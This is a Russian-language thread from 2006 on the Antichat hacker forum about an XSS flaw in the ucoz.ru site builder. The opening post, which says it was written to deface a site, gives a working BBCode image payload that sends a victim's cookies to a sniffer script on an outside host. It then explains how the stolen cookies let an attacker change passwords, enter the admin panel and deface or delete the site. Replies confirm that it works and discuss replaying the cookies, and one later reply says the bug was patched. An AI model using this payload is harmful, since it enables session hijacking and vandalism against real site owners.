HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

ucoz.ru
  #1  
Старый 03.04.2006, 13:02
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
С нами: 11156006

Репутация: 749


По умолчанию ucoz.ru

Просто была необходимость задефейсить один сайтик на укоз.ру

[img ]javascript:document.images%5b0%5d.src=%22http://snif/sniffer.php?%22+document.cookie[/img]

Вот уязвимость хсс для интернет эксплорер. С помощью полученных кук можно сменить пароль жертвы (и вообще все настройки аккаунта), пройти в любой раздел,(админка,добавка/редактирование новостей и все остальное - зависит от того чьи куки стыбрил), ну а с этим легко можно сделать дефейс или снести просто весь сайт.

Последний раз редактировалось Zadoxlik; 03.04.2006 в 13:04..
 

  #2  
Старый 05.04.2006, 23:35
Antony_
Новичок
Регистрация: 02.04.2006
Сообщений: 4
С нами: 10582588

Репутация: 1
По умолчанию

Спасибо огромное. Всё работает!
Кстати, никто не знает...каким образом шифруется там пароль...
p.s. Только в админку попасть вроде как нельзя. т.к. приходят куки от форума(сайта), но не от аккакунта. А это два разных пасса.
Либо я чего - то не понимаю?

Последний раз редактировалось Antony_; 06.04.2006 в 00:16..
 

  #3  
Старый 08.04.2006, 01:20
D1ma
Новичок
Регистрация: 10.05.2005
Сообщений: 22
С нами: 11053400

Репутация: 0
По умолчанию

При замене своих кук полученными,не заходит Админом
 

  #4  
Старый 08.04.2006, 16:03
Antony_
Новичок
Регистрация: 02.04.2006
Сообщений: 4
С нами: 10582588

Репутация: 1
По умолчанию

Заходит, но только на форум(у меня покрайне мере так ?
А что менял? Какие значения?
 

  #5  
Старый 10.04.2006, 18:04
Antony_
Новичок
Регистрация: 02.04.2006
Сообщений: 4
С нами: 10582588

Репутация: 1
По умолчанию

Багу прикрыли
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Баг на форумах бесплатного сервиса Ucoz.ru WizART Уязвимости CMS / форумов 1 04.02.2006 11:26



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.